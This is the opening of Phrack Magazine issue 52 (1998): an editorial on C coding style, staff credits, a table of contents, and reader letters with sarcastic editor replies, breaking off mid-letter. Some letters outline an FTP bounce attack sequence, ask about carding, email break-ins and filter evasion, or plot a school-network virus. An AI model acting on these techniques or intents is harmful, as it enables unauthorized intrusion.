---[ Phrack Magazine Volume 8, Issue 52 January 26, 1998, article 01 of 20 -------------------------[ P H R A C K 5 2 I N D E X --------[ Choose your own $PATH adventure Whew. You would be quite surprised at the evil wheels I had to set in motion in order to get this issue out. According to Newton, a Phrack Issue remains at rest or continues to move in a straight line with a uniform velocity if there is no unbalanced force acting on it. This issue was at rest. Its velocity was constant. And there were few forces acting on it. Anyhow, after many machinations it's here. Enjoy. I have a gripe. Something upon which I'd like dwell for a spell. Let's talk about coding aesthetic (from the C programming standpoint). Now, this is not a harangue about effective coding or efficient coding, I'll save those for some other time (perhaps for the time when I feel I can write effective and efficient code proficiently enough to vituperate to those who do not). I want to touch down on a few topics of visual appeal, which are overlooked so often. The five major areas I will cover are indentation, brace placement, use of whitespace, commenting, as well as variable and function nomenclature. I suppose I should also mention that coding style is a personal preference type of thing. There are all kinds of schools of thought out there, and all kinds of methodologies on how to write pretty code. In the grand scheme of things, none are really any more correct than any others, except mine. C is, for the most part, a format free programming language. Code can be written with all manner of whitespace, tabs, and newlines. The compiler certainly doesn't care. The machine doesn't care. This can be a double edged sword. There is quite a bit of room for artistic interpretation. And just like in real life, there is a lot of crappy art out there. Indenting your code is a must. Please, do this. Indentation is here for one simple reason: to clearly and unequivocally define blocks of control. However, 8 space tabstops are overkill. Unless you are using a 2 point font on a 13" screen, 4 spaces should easily define your control blocks. This allows you to maintain clarity on an 80 column screen while nesting blocks of control much deeper then you would with 8 space tab stops. 2 space tabstop advocates should be shot. However, don't let typography take over your code (ala ink obscuring the intent). If you have 7 million levels of indentation, perhaps you should rethink your approach to tackling the problem... Bracing has a simple solution. The most effective use of bracing is in placing them on newlines so that they neatly enclose the area of control. This is especially important with nested levels of control. I know this generates empty lines. Oh well. They're free. Blocks of control become easily visible and it is easy to isolate one from another. This goes for functions as well as conditionals and loop structures. I know I go against K&R here. Oh well. In the pursuit of clear, readable code, whitespace is your friend. Single space all keywords and all variables and constants separated by commas. It's a simple thing to do to drastically improve readability. When you have a series of assignments, one after another, it's a nice touch to line them up on the closest relative 4 space boundary. And please, no spaces between structure pointer operators and structure contents. Commenting is a delicate matter. Descriptive, concise, well written code shouldn't really need commenting, or at least very much of it. But this isn't a rant about descriptive, concise, well written code. If you feel the need to comment your code, follow a few simple rules: - Keep the comment block as small as possible. - Don't tab out your comment frames to line up with each other. That's just plain fucking annoying. If you're doing that, you have too many comments anyway. - Commenting datatype declarations rather then the functions that manipulate them is usually more helpful. - If you must comment, keep your style as consistent as possible. If the commenting detracts from the readibilty of your code, you've just ponied up any clarification you might have achieved with the commenting. The major exception to these rules are file headers. The beginning of source and header files should always have some descriptive information, including: file name, author, purpose, modification dates, etc... These comment blocks should always have a simple vertical line of unobtrusive astricks, framed with the required forward slashes. People using C++ style commenting in C programs should be drawn and quartered. The other exception to this rule is when you are writing code specifically for the benefit of others. If the code is intended to be a learning tool, copious commenting is allowable. Variable and function nomenclature should have connotation as to what their purpose in life is. As short as possible while still preserving some sort of identity. Descriptive names are wonderful, but don't go overboard. Generally, a condensed one or two word descriptor (possiblely connected via an underscore) will work fine. And please, no mixed case. The only time uppercase characters should appear in C code are in symbolic constants and macros (and possibly strings and comments). This tirade is the result of my experiences in reading and writing C code. In my travels as a stalwart mediocre programmer, I have progressed through many levels of maturity in my programming style. Much of my old code exhibits many of the very things eschewed as anathema in this jeremiad. Well, what can I say? I believe that I have grown. I am at home with the me. This is me breathing. (Tell me what movie that's from, and I will give you a Phrack Donut.) Enjoy the magazine. It is by and for the hacking community. Period. -- Editor in Chief ----------------[ route -- Director of Public Operations --[ dangergirl -- Phrack World News --------------[ disorder -- Werdsmith ----------------------[ loadammo -------- Elite --------------------> asriel -- Santa vs. Jesus ----------------[ ISS vs. SNI -- Festively Plump ----------------[ Cartman -- Extra Special Thanks -----------[ No one. -- Official Phrack CD -------------[ FLA/Flavour of the Weak -- Official Phrack Drink ----------[ `The C Kilborn` (2.9 parts ketel one, -----------------------------------| .1 parts tonic) -- Shout Outs and Thank Yous ------[ Lords of Acid, cantor, Yggdrasil, -----------------------------------| snokerash, Voyager, TNO, Jeff Thompson, -----------------------------------| angstrom, redragon, Rob Pike, halflife -- B.A. Baracus Phrack Fracas -----[ loadammo vs. Death Veggie -- Original flip.c author (props) -[ datagram -- Gas Face Given (drops) ---------[ solo, klepto Phrack Magazine V. 8, #52, January 26, 1998. ISSN 1068-1035 Contents Copyright (c) 1998 Phrack Magazine. All Rights Reserved. Nothing may be reproduced in whole or in part without written permission from the editor in chief. Phrack Magazine is made available quarterly to the public, free of charge. Go nuts people. Subscription requests, articles, comments, whatever should be directed to: phrackedit@phrack.com Submissions to the above email address may be encrypted with the following key: -----BEGIN PGP PUBLIC KEY BLOCK----- Version: 2.6.2 mQENAzMgU6YAAAEH/1/Kc1KrcUIyL5RBEVeD82JM9skWn60HBzy25FvR6QRYF8uW ibPDuf3ecgGezQHM0/bDuQfxeOXDihqXQNZzXf02RuS/Au0yiILKqGGfqxxP88/O vgEDrxu4vKpHBMYTE/Gh6u8QtcqfPYkrfFzJADzPEnPI7zw7ACAnXM5F+8+elt2j 0njg68iA8ms7W5f0AOcRXEXfCznxVTk470JAIsx76+2aPs9mpIFOB2f8u7xPKg+W DDJ2wTS1vXzPsmsGJt1UypmitKBQYvJrrsLtTQ9FRavflvCpCWKiwCGIngIKt3yG /v/uQb3qagZ3kiYr3nUJ+ULklSwej+lrReIdqYEABRG0GjxwaHJhY2tlZGl0QGlu Zm9uZXh1cy5jb20+tA9QaHJhY2sgTWFnYXppbmU= =1iyt -----END PGP PUBLIC KEY BLOCK----- As always, ENCRYPTED SUBSCRIPTION REQUESTS WILL BE IGNORED. Phrack goes out plaintext. You certainly can subscribe in plaintext. phrack:~# head -20 /usr/include/std-disclaimer.h /* * All information in Phrack Magazine is, to the best of the ability of the * editors and contributors, truthful and accurate. When possible, all facts * are checked, all code is compiled. However, we are not omniscient (hell, * we don't even get paid). It is entirely possible something contained * within this publication is incorrect in some way. If this is the case, * please drop us some email so that we can correct it in a future issue. * * * Also, keep in mind that Phrack Magazine accepts no responsibility for the * entirely stupid (or illegal) things people may do with the information * contained here-in. Phrack is a compendium of knowledge, wisdom, wit, and * sass. We neither advocate, condone nor participate in any sort of illicit * behavior. But we will sit back and watch. * * * Lastly, it bears mentioning that the opinions that may be expressed in the * article of Phrack Magazine are intellectual property of their authors. * These opinions do not necessarily represent those of the Phrack Staff. */ -------------------------[ T A B L E O F C O N T E N T S 1 Introduction Phrack Staff 12K 2 Phrack Loopback Phrack Staff 60K 3 Line Noise various 79K 4 Phrack Prophile on o0 Phrack Staff 07K 5 Everything a hacker needs to know about getting busted Agent Steal 72K 6 Hardening the Linux Kernel daemon9 42K 7 The Linux pingd daemon9 17K 8 Steganography Thumbprinting anonymous 35K 9 On the Morality of Phreaking Phrack Staff 19K 10 A Quick NT Interrogation Probe twitch 18K 11 Subscriber Loop Carrier voyager 48K 12 Voice Response Systems voyager 18K 13 Pay Per View (you don't have to) cavalier 19K 14 The International Crime Syndicate Association D. Demming 20K 15 Digital Certificates Yggdrasil 14K 16 Piercing Firewalls bishnu 31K 17 Protected mode programming and O/S development mythrandir 76K 18 Weakening the Linux Kernel plaguez 27K 19 Phrack World News Disorder 64K 20 extract.c Phrack Staff 08K 687K ----------------------------------------------------------------------------- When Sen. Bob Kerrey (D-Neb.) was asked to define encryption, the results were horrific. "Well, I mean, to answer your question, I mean, encryption is -- the political equivalent of encryption is you ask me a question, I give you an answer and you don't understand it," he managed. "I mean, I intentionally garble the answer frequently. I intentionally garble the response so that you can't understand what I'm saying. And that's -- you notice that I've got the ability to do that." ----------------------------------------------------------------------------- ----[ EOF ---[ Phrack Magazine Volume 8, Issue 52 January 26, 1998, article 02 of 20 -------------------------[ P H R A C K 52 L O O P B A C K --------[ Phrack Staff [ Ed. note: The letters are perhaps editted for format, but generally not for grammar and/or spelling. I try not to correct the vernacular, as it often adds a colorful perspective to the letter in question. ] 0x1>-------------------------------------------------------------------------- [ P51-02@0x14: ...Xarthons submission about Linux IP_MASQ in Phrack 50... ] In reply to Swift Griggs ranting about my stupidity, (and disrespekt i recieved from the rest of the AOL community) Swift: the 'problem' in IP_MASQ which I reported was not meant to be considered a security problem, rather a notification of a potential problem, or at least this is what i was told. i stole this 'problem' from a evil hacker who works for the NSA. at the time, if i had been aware that the info i ripped from him was totally false, i would have said so in the letter. and believe me, if [named_removed] was awake more than 5 minutes a day i would be severely anal at him for informing me of this false intelligence. the main thing the hacker/phracker/aol community needs to learn from this event is that when giving information to be ripped, it should be correct. next time ill make sure to reword the context i have pasted with GPM properly. btw, i must apologize for the tabs in this letter, pico has proven difficult to use. i must go, i have to pry this gerbil off my flacid cock. thanks, and keep hackin! xarthon 0x2>-------------------------------------------------------------------------- [ P51-02@0x1b: You have our permission to write r00t on your backpack. ] That may be the funniest response to a letter I have ever read. Your response to MICH Kabay was a close second. The wait was well worth it. I would rather see quality Phrack 2 or 3 times a yar than crap delivered every 3 months. I have to get back to reading now.... pip (John) [ Go away Pip, nobody likes you. ] 0x3>-------------------------------------------------------------------------- [ P51-02@0x2c: I have a question regarding a certain piece of hardware... ] It's a barcode scanner used at some terminals, such as public libraries. You plug it in between the keyboard and the computer, and when you want to scan in a barcode from a book being checked out or an item being purchased, you push the button on the SCANNER and it outputs the barcode in ASCII numeric just as if it had been typed in from the keyboard. So, now ya know. Unknown/604 -- d00d, that's a s00p3r s3kr3t CIA, FBI g0vt. c0nspir@cY k3yb0ard f1lt3r!!@@!21 Actually, your mystery device sounds more like the "box" that connects between the keyboard and a barcode scanner. The "SCANNER" connector is where you'd plug in a typical "wand" or "gun" barcode reader. Not much you can do with it by itself, IMO. Again, it might be something else, but that's what it sounds like to me. nate@millcomm.com -- What this sounds like is the interface from one of the wand or lightgun-type laser barcode readers. These can be seen in action at some of the retail outlets around here for reading barcodes from clothing price tags or whatnot. One of those useful inventions that came out of turning 386's into POS terminals. It's probably useless without the accompaning wand, but you might keep it around and try to find the missing part. wiz -- [ We received a gaggle of responses to this inquiry. To those of you who sent in responses, our humblest thanks. ] 0x4>-------------------------------------------------------------------------- Hi! I need your help! Tell me, please, where I can found information via Internet about Carding (Scheme of reader/writer and etc.) thanks. Bye. [ http://www.etexguide.com/cardtricks ] 0x5>-------------------------------------------------------------------------- [ P50-03: Portable BBS Hacking by: Khelbin ] Dear Phrack, An old article of mine entitled "Portable BBS Hacking" appeared in Phrack issue 50 under the line noise section. In Phrack 51, a reader expressed that he/she was frustrated at not being able to apply the techniques that were described in my article. Please publish this response in Phrack 52 Let me state right off the bat that "Portable BBS Hacking" was not written to specifically expose any one software-specific problem. Instead, the article introduced a potential security threat to all BBS software so that SysOps around the globe could check for such vulnerabilities and correct the problem if it was present. A 'mock' Renegade setup was used just because some software had to be used in order to explain the theory behind the attack. Now to address the frustrated reader who is obviously aspiring to become an ever-so-elite BBS-h4x0r! While I often enjoy toking on a crack pipe, this method was tested prior to writing this article. It was tested on Renegade 04-x quite some time ago (as the article had been written some time ago, but never published). I currently run FreeBSD 2.2.2, so I havn't been able to do any more testing to help you hack BBS' and become ph33red. *BUT*, I am sure that versions of THD ProScan (a utility to scan uploaded files for viruses and other problems) will foil this attack. I am also sure (just by what I remember of how Renegade works) that If you follow the steps that I gave you in Phrack 50 correctly, upload a file, and then the SysOp were to (X)tract files from that file into \temp that it would work. I am also sure that there are other packages out there other than THD ProScan that do the same thing, but not in a secure fashion. The methods described in "Portable BBS Hacking" will also work with these packages. I hope you weren't just having Renegade check the file integrity with pkunzip -t or just view the contents of the zipfile. Your response wasn't very specific so it's hard for me to be specific in this reply however, I can tell that you also enjoy an occasional joint of crack, so feel free to contact me sometime and we'll smoke! Yours Truly, Khelbin Sunvold 0x6>-------------------------------------------------------------------------- Hi, What program do I have to use in order to read the Phrack Magazine? Thank you, Adrian [ We at Phrack Magazine do not explicitly endorse any particular program, however, many 12 step programs work wonders: Narcotics Anonymous, Overeaters Anonymous, Codependency Anonymous, Debtors Anonymous, Beyond Controloholism, Science Fiction Addiction, etc. Also try: `gzip -dc phrack.tgz | tar xvf -`. ] 0x7>-------------------------------------------------------------------------- Please allow me to introduce myself. My name is Itai Dor-on and I am a system integrator From Israel. [ No introductions are necessary. ] I got the phrack.com address from one of the subscribers on the firewalls@GreatCircle.COM mailing list in response to my inquiry on smtp exploits. (phrack 50) [ shattered:~/Phrack/50:~> grep -i SMTP * | grep -i exploit shattered:~> There are no SMTP related exploits in Phrack 50. ] I downloaded the file but it seems that it is encoded in a format which I can not read. I use windows 95/NT. I would like to know if there is a special viewer for the file. [ See above letter. ] Is there other informative information in the phrack.com site that is relevant to Security exploits in tcpi/ip [ Phrack 48 - 52 ] I thank you in advance for any response Yours Truly, Itai Dor-on 0x8>-------------------------------------------------------------------------- Phrack is the best magazine of its kind I've ever seen !!! Maybe you could write something about tapping telephone wires in order to record data and fax on a portable tape recorder. I've read an article from Damnation that was pretty good, but maybe you could give me, and the other readers of course, some additional information. I'm also interested in hacking the E-mail server of my ISP in order to read my teacher's mail, so what kind of program do I need to do this ? I know his login but I don't know his password. I've got a terminal program called Dialog that doesn't seem to be very useful, but maybe you know a better one ?!? Now, my last question: I'm using CuteFTP to log on to my homepage's folder . One day I've found some write protected folders and files, so my question is how do I get access to these files and how do I go to other folders to which I'm not allowed to go (hidden,write-protected, etc.) ? Thank you very much in advance ! Host [ I had a flame all ready and prepared, but this letter really seems to set itself on fire. ] 0x9>-------------------------------------------------------------------------- Hey guys, I'm a first time ready and, well duh, first time responder to yer mag...I must say that I am thoroughly impressed with what you've all put together...as a Linux user, it shall certainly be a very useful utility/resource for me...I just nabbed the 51st issue and it rocks thus far...downloading the other issues as I type this...just thought you might like to know ya got another reader who is overjoyed at getting off his lazy ass and finally reading yer mag which i've heard about in the past... Ezines never were something for me but i said fuckit and went for Phrack.. your mag is the most informative and entertaining Ezine that i've seen to date (and i been on the 'net for 4+ years now...that might say something) anyhow, enuf blabber from me, L8! -GnEaThEg0d [ Well, thank you very much. ] 0xa>-------------------------------------------------------------------------- I'd like to congratulate Narbo on his brief introduction to CCS7. I was begining to think that noone was interested in telecommunications anymore. [ Agreed. Note that we would very much appreciate further submissions of this kind. ] One thing I'd like to add for Phrack's Japanese audience is that they are the odd balls when it comes to signaling data links. While signaling data links are 56kbps in North America and 64kbps virutally everywhere else, Japan uses 4.8kbps links. Actually I guess we, in North America, are also a little odd at 56kbps but at least it's closer to the norm. :) -khelbin 0xb>-------------------------------------------------------------------------- Yea, I wanna subscribe to phrack..This is my e-mail address..noah6@juno.com...Sign me up if I'm writing the right place..if not..tell me how to subscribe later oh yea..I know I'm not supposed to ask..but I don't have internet access..I could use all the back issues of phrack in one big long letter if you could..I can't recieve files with this account..so if you could cut and paste or some shit... later [ Sure. Let me get right on that. Even better, what's your postal address? I'll have the Phrack Tactical Team deployed to your house to come hit you on the head with a tack hammer because you are a retard. ] 0xc>-------------------------------------------------------------------------- Good issue, by the way... [ Thanks! ] So whassup with the Milla pictures? Did you mention them in P51-1 just to taunt us? How do you get the _non_ASCII version of P51? You're too cruel... :-) JSRS [ Sorry. That Carl's fault. He's new. (Moo. Moo moo.) ] 0xd>-------------------------------------------------------------------------- To the Anti-Christ, [ Apparently, there was a postal mix-up and we are now getting Satan's mail. ] When I grow up I want to be just like you. [ Great! So, I'll see you at the next Klan-youth meeting? ] That said, can you walk the talk? If so, I have a challenge for you. [ 'walk the talk'? Note: This is email. Something you've mailed to a whiley bunch of knuckle-knobs. And quite possibly something that could be used to make others laugh at your expense. In the future, take the time to grammar and spell check your letters to minimize the emotional damage you are bound to suffer. ] I am a neophyte in the DarkSide,and need some help catching/avoiding a phreaker,hence the interest in your mag. He breaks into phone lines at home and work. Tapes conversations and interjects various rude noises on important calls. Do you have any ideas as to what I can/should do to protect my [ Sommy! ] privacy and catch this guy? If this is not within your realm of expertise, can you refer me to someone for whom it is? [ Try the PHONE COMPANY. ] Don't take my intial inquiry as anythng but an effort to become part of the hacker/phreaker world for the sake of my own protection. I [ For your own protection, I suggest NOT becoming part of *any* community. Live the rest of your life as a hermit inside a hollowed-out oaktree. ] understand there are many 'good' hackers in your world willing to offer assistance in this arena. Your assistance would be greatly appreciated. Thanks. 0xe>-------------------------------------------------------------------------- Sirs, First,thanks for the obvious hard work that goes into your 'zine. I guess I'm what you what you would call a "tryin' to be". I've got all the back issues and read some every day.I was just reading 51,and had to say that besides all the other great things in the 'zine,it's great to see some people still have a great f*ckin' sense of humor. Thanx again, (to busy trying to learn to have come up with a cool handle)...R [ Stop it. I'll get a big head. ] 0xf>-------------------------------------------------------------------------- I am a newbie hacker/freaker/cracker/sometimes anarchist. I have read some of your first Phrack issues and I LOVED EM! Especially the bomb making!I am gonna try that stuff when I finally go to my dad's house later on this year....I wanna blow shit up!! I have a submission that you are gonna get sooner or later about making the ULTIMATE pipe bomb....it is REALLY destructive... THANK YOU Demonhawk [ ATTN Deliquent parents: Increase Ritalin by 0.5 mg/Kg. ] 0x10>------------------------------------------------------------------------- Day in the Life of a Teenage Hacker: Story of My Current Non-Life By: Demonhawk I wake up, staring at the ceiling for ten minutes before my mother finally walks in and says, "Time to get up!" I stand and dress myself. Wearing the only thing that I can think of that I like, blue jeans and just whatever shirt looks best at the time. I go and comb my hair (walking to my mom's end of the trailer house to use that bathroom because mine doesn't have a mirror, nor a sink, nor more than 10x10 feet of space). I walk back to my room and get my books ready for school. The block schedual makes my backpack EXCRUTIATINGLY heavy on B days while on A days it is light as a feather. I lay down-most of the time-and go back to sleep. Others I turn my computer's monitor on and type something for a while (my mom says it is bad to leave your computer on all night, WRONG! Little does she fuckin' know it is better to leave it on!). It is time to go to school and my mom drives me to t he middle school (Connally Middle School) where I go in and play on the computer suntil school starts (get there 30 mins early). I go to my first class, still groggy from the little rest I had the night before while I lay awake in my bed pondering what I could do to the school's computer system. The recenlty installed network (Novell) was supposedly student proof (little do they know). I have the software and I could hack it easy. Crack the passwords that the teachers think they are so smart to have one that a student can't guess. I think about the consequences of hacking 'em, then realize that it would be stupid to hack 'em, after all, I am the only one smart enough on the computers to hack em. I can crack Windows passwords (easy) with a boot disk (or even booting into dos). Last year, I will remember angrily, I remember how I got a bum wrap for crashing a teacher's computer. I was on it then absent for a week and then come back to find out all fingers were being pointed at me. I got kicked off the annual "good kid's" Six Flag trip and that REALLY pissed me off. Then, as the first period teacher begins to yell something like "Get to work!" (I am in shop first period) I wake up and realize I had been thinking. Most of the period I will talk to my friends about hacking (the two-maybe three-friends I have in that class) and they will ask me computer questions and I will answer them (and if I don't know an answer I will make one up, after all, they have no idea how to use a computer to its full limitations). After a few more minutes of thinking I realize a virus will be the way to go. The only problem is putting it on the computer. How? Well, maybe if I can get access to a teacher's computer while she/he is out of the room. Yeah, that would be the only way. But the witnesses (who am I kidding the kids up there would LOVE to see the computers crash, in fact, I have been offered $$$MONEY$$$ to crash em). I think about the virus idea for a moment. Yeah, that is the way to do it. First period is over. I move to my second class. It is a no brainer (on both of the days) and I have a lot of time to plot out my plan. Trojan Horse. Yes, or maybe Darth Vader...as a calling card. Yeah, that would be the way to go. The Trojan Horse virus followed up by the Darth Vader virus. Yes. Well, I have one of those two. Now lets think here. How to gain access to the computer at school. The teacher looks at me and tells me to "get to work!" and I look at him/her and reply, "But I am already finished!" and they leave me alone. But, maybe I should wait until I am in High School (when the entire district will have the internet) and I could port in and leave the virus. Yeah, that would work, I couldn't be blamed since I wouldn't go to the Middle School any longer. That is a possibility. I cheat at my math for a while (copying the back of the book for some easy answers) not because I am dumb, hell no, I am in Algebra I in the 8th grade for Christ's sake! No, I am just lazy, except when it comes to the computers. Second period is over. I walk to my third class of the day, an hour till lunch when I get to talk to my ENTIRE 5 friends at one time (there are some almost friends in this group, people I get along with and, yes, on occasion like to hang around with). You see, I am a "nerd" and proud to be one! Now, this is the thing. I am not just ANY nerd, I am a nerd with RED hair and fairly THICK glasses with THICK frames (I want contact lenses that have mirrored silver on the outside but I am not allowed to have them for some fucking unknown reason). I do my work, hoping that lunch will come, and eventually it does. I walk down the halls meeting a friend or two along the way, getting pushed by hicks that don't think computers are "cool". (Just as something that made people think I did a speech in Drama class on how computers are gonna crash in 2000 because of the Millenium Bug. One kid almost pissed in his pants when I told them safty systems on Nuclear power plants might go offline and how that all cars with electronic timers that shut down until an inspection won't run. Plus power might go out, I think that made them appreciate computer freaks like you and me just a LITTLE more since WE are the only ones that can save them from that hideous fate!!) I am laughed at because I run and internet Star Wars club (The Conflict at www.geocities.com/Area51/Zone/9875 ). But they don't laugh when I tell them I can hack into the school's computers. They look at me dumbfounded and then make some smart ass remark. I look at them for a second and walk away, I know they don't understand how much of a computer GENIUS I am. Well, to tell the truth I am NOT really a computer GENIUS. Well, in some ways I am. I mean I CRAVE knowledge like I CRAVE food when I am hungry and water when I am thirsty. I can't get enough computer knowledge, I ALWAYS need more (currently I am learning C, C++ JAVA, JAVAScript, Visual Basic, and QBasic <----I forgot most of what I used to know on that one) I eat my lunch (usually Nachos but sometimes Lays potato chips and an ice cream) and then go outside where I get an RC Cola. The bell rings and we are all herded back inside the main building where we suffer out the rest of the day. I make it past the rest of 3rd with no problem. Then comes fourth. It is a little nerve racking to sit there while time slowly slips by, waiting for that bell to ring so that you can be set free of this hellish place. The bell rings and I leave the school, heading outside where the buses load. Mine is the last and after an hour or waiting it arrives (thank GOD I am the first one off) and I go inside my nice, cool house. I turn my computer on (if it is off) and begin my homework (I lie about having homework so that I can play on the computer without being touched by my mother). I wash the dishes and water the dogs. Then I sit down and play on the computer a little bit. I get on the internet a little while later. I learn a LITTLE more hacking and play some games over the internet (ain't technology wonderful???). I am far from being an 31337 hacker, but I am doing some good a little. I am basically a newbie but I can still hack Novell (childs play). After a while of this I take a shower and lie down in bed, dreading the next day (unless, of course, it is a weekend). And that, is my Non-Life. [ ATTN DELIQUENT PARENTS: Increase Ritalin by 1201293 mg/Kg. ] 0x11>------------------------------------------------------------------------- Dear sir, First off, i think phrack is a wonderful publication, the best of its kind and better than most, if not all, of the computer related commercial publications. You and your staff are doing a great job and please keep up the excellent work :) [ So, we're better then 2600. Thanks! *That's* the validation we needed! ] That said, i have a request. I'm writing a paper on the hacking subculture and such a project would be, to say the least, severely lacking without the inclusion of groups like Phrack Inc., 10pht, and [ Phrack is not incorporated. And you mean `l0pht`. ] r00t. So i would greatly appreciate it if you could fit it into your [ You are already severely lacking. You failed to mention the guild. You even forgot b0w. ] doubtless busy schedule to send me a history of Phrack. It can be as brief or as in-depth as youd like. From just the date of creation and pivotal events in Phrack history to a summary of every passing member's contributions to the publication.. anything you can send will be an asset to me. Also, if you or any of your staff members would be so [ I'll get some of my interns right on that. Alhambra! Get to it! ] gracious and godly-wonderful as to answer the few questions below that would also be greatly, GREATLY appreciated. Q: What is your most commonly used handle and why did you choose it? [ `route`. Cos I thoroughly route my foes. And also cos I route through all my girlfriends' purses when they are in the bathroom. ] Q: What is your position at Phrack? [ I AM PHRACK. ] Q: When did you realize you were a hacker(or phreaker, cracker, whatever applies to you)? [ It is something you are born with. It is not something you learn. There is no single moment of realization. It is something you just `are`. It is this unexplicable and inexorable pursuit of knowledge. To learn. To break. To fix. To push. To optimize. To learn. To hack. ] Q: What do you think hacking is Really about? [ Oh c'mon man. Chicks and Money. That's what it ALL boils down to. ] Q: How do you think the 'scene' has changed, and where would you like to see it go? [ See P48-02a ] Q: If you could say anything to the community at large about hacking, what would it be? [ Um. Most of what you people consider hacking is simply a justification or shield for doing illegal acts. ] One last thing, do you know where(email, www address, whatever) i could contact current or former members of 10pht, r00t, or any real [ Um. Let's see. http://www.l0pht.com. http://www.r00t.org. And so on. You're not a very smart person. ] group (ie: not one of the lame new groups trying, unsuccessfully, to copy the greatness of the older groups)? Any response, including negation so i can search elsewhere, would be greatly appreciated. Thank you for your time. Weaver 0x12>------------------------------------------------------------------------- Is it possible to "Hide" your ip while on tcp/ip connection if so how? Thanx [ Yes, look into Onion Routing. ] 0x13>------------------------------------------------------------------------- Hi Phrack-editors, I'm looking for a good and experienced hacker to hack a German site. There is enough money involved to satisfy you. [ My price is quite high. Actually, fuck it. I don't want money. Give me flesh and fame. Get me some elite movie role where I am the hero and Milla Jovovich is my love interest. Then we'll talk. ] I will give your more information with further correspondence. Please let me know soon if you are interested, (just reply to this usa.net address), thank you, Diogenes 0x14>------------------------------------------------------------------------- I recently read about the ancient ftp bounce attack. I have tried it and it works on versions of ftp that are lower than wu-2.4.2. Here's what I do. [Receiving Machine no system req's except write access] TYPE I PASV (Give's IP then port) STOR [Sender Machine w/ver 2.4 or lower] TYPE I PORT RETR [Receiving Machine] Binary Mode Transfer Started It then goes on to get the file. But... If it is a wu-2.4.2 ver computer, the sender machine says Illegal PORT Command, when you type the IP and port of the receiving computer. You can only do a PORT command that includes the IP address that I am coming from. Sorry to say I don't know how to do any kind of source route or IP spoofing, although I'd be interested to hear if this was the only answer, and am not sure if there is a way to get around this. 0x15>------------------------------------------------------------------------- how can I phreak succsesfully in Germany??? [ The Germans hated me when I was there. I think they hate all Americans. Something to do with WWII or something I guess. ] 0x16>------------------------------------------------------------------------- Hello there :) Probably u don't know who I am ... [ Definitely. ] well, I'm an italian boy and I wish to say ya one thing ... You're Great. [ Oh. C'mon now... Really? ] I've just start to reading Phrack (the last issues) and I guess that it's a very cool wonderful zine. [ Get out. You think so? ] Why am I tell ya this ?? Well, since I think that one person is as ya ... well he's great. [ Now stop that. I'm really getting embarassed. ] I'm trying to learn something from ya (and I shall overcome .... I hope :) ) I'm interesting in hacking .. but I'm not like some other ppl that always ask "How can I be an hacker ??" "where I can find something to became root" I guess that they haven't understood nothing The REAL HACKER (for me) is an expert, has an etic and he hack to learn The knowledge is one of the thing most important in the world (the other ones are the GIRLS =) ) So I won't ask ya how to be an hacker ... (even cause you'll propbably say me FUCK YOU ;) ) we're so far but maybe one day we could meet :) to share our knowledge [ Wait a minute. Are you coming on to me? ] Well, Thanx a lot and excuse me for all the time you spent to read this letter Excuse me also for my terrible english [ NP. Luckily Aleph1 was over, so he translated for me (`course, then I needed someone to translate that, too). ] Cool and great stuff has Phrack =) [ Agreed. Great stuff has Phrack. ] 0x17>------------------------------------------------------------------------- Hi, i noticed that you fixed up your web page, and thats nice, but my probelm is, that when i downloaded the phrack 51 issue, it came like this : " phrack51.tar.gz " so,....what kind of program do i use to open it? Can you just put all issues in zip format? That would help us all! [ 'Us all'? You are of course refering to the entire moron population. Phrack does not cater to the morons of the world, sorry. Try 2600. I hear their target audience is a bit thicker skulled. ] 0x18>------------------------------------------------------------------------- Hi, I sent you an email a while back asking you to forward a message to an author of one of your articles, since he wanted to remain anonymous. However I never got any reaction either from the author or from you. It's really important for me that I find him to discuss some techicalities. The article was; "How to make your own telecards" Volume Seven, Issue Forty-Eight, File 10 (and 11) of 18 Did you manage to send the email off to him successfully? All I want is for him to contact me on this address (raven@swipnet.se). If he wants to remain anonymous he could easily create an email account on www.hotmail.com or another service of that kind. It would be very nice of you to forward this email to the author of the article and reply to me wether it was sent successfully or if it bounced back. thanks [ This is the best we can do. ] 0x19>------------------------------------------------------------------------- Hey there... is there any way to get phrack in just one big file instead of getting it in a lot of separate files? Thanks... Thanks, Crystalize [ `cat phrack* > master_phrack.blob` ] 0x1a>------------------------------------------------------------------------- im having trouble finding uk phreak iNfOs! can u help me out? im looking 4 bt c7 info and uk payphones. cheers [ Hrm. I know several Brits who like me tho. And I like them, too. Much more then the Germans. The .uk girls are waaay prettier too. ] 0x1b>------------------------------------------------------------------------- HELP> Your the Best I need your help FAST [ AHM THE BEST!@ ] I have 2 files in Corel Word Perfect 7.0 that have pass words on them I need the Fast Can you help? Or know anyone who can? I'm in the U.S. [ Great. We're practically neighbors then. ] I will pay I hear your one of the Best out there :-) [ AHM THE BEST!@ ] Melissa P.S.I need to try to get these by Sun. Night I can e-mail them to you? [ Hrm. `Melissa` huh... Hrm.. You'd better bring them over, this could take a while. ] 0x1c>------------------------------------------------------------------------- Just wondered why everyone raves about PGP, even thogh it's breakable. [ What the hell are you talking about? ] Is it possible to by-pass 'Proxy blocks' on an internet connection? The local iNet connection has blocks on all hack/warez sites whereby when you try and access them you get a 'You're trying to access a filtered URL' message. I figured it would be possible to re-route the conneciton but haven't a clue how. [ Shure. Try some covert tunneling via IP fragmentation or IP-IP. ] Also, how do you find out all this stuff about tapping phones, cell-net busting and telephone, errr, dabbling?? Do you research it yourself or just accumulate it form others? [ Everything I know about phones is self-taught. ] Many thanks, Denyerec 0x1d>------------------------------------------------------------------------- Hi, I've been reading a-lot of phrack zines lately and seeing your name in most of them, I thought your the best to answer my questions ??? To become a hacker where do I start ? [ New Zealand. Or at least as far away from CA as possible. ] What books should I read ? [ Anything by Stevens/Knuth or any of the millions of smarter-then-you people out there. It's a safe bet that, if they wrote a book, they're smarter then you. Very safe bet. Like, Fort Knox safe. ] What languages do I have to learn ? [ English is a good start. ] Which sites are the best to go to for information on hacking (including newsgroups) ? [ Anything in the alt.* hierarchy is a good plan. It's ALL *choice* material. ] I've only started hacking and that's into applications on my computer and my friends computers. [ That's nice. ] I hope I'm not bothering you with this message. [ No bother at all. I'm shure you've made someone smile, somewhere. ] 0x1e>------------------------------------------------------------------------- Dear Phrack, I'm looking for a phreak to work in France and I couldn't find such informations on the Net; so, is there any chance that blue box may work in France, or the Phoney app which comprise red, bleu, green, and black boxes, and if so it is, how does it work ? Also, there is any site on the Net where I can find informations and tools for phreak in France? Thank you so lot by advance for your advices. [ Now, I don't know any French people, but, I think if I met some, they would like me. I don't give into all that `French people suck` propaganda. Nono. I think they rock. And the French women are really pretty, too. ] 0x1f>------------------------------------------------------------------------- I use a macintosh when I ip spoof. Please, if you use a macintosh, send me a 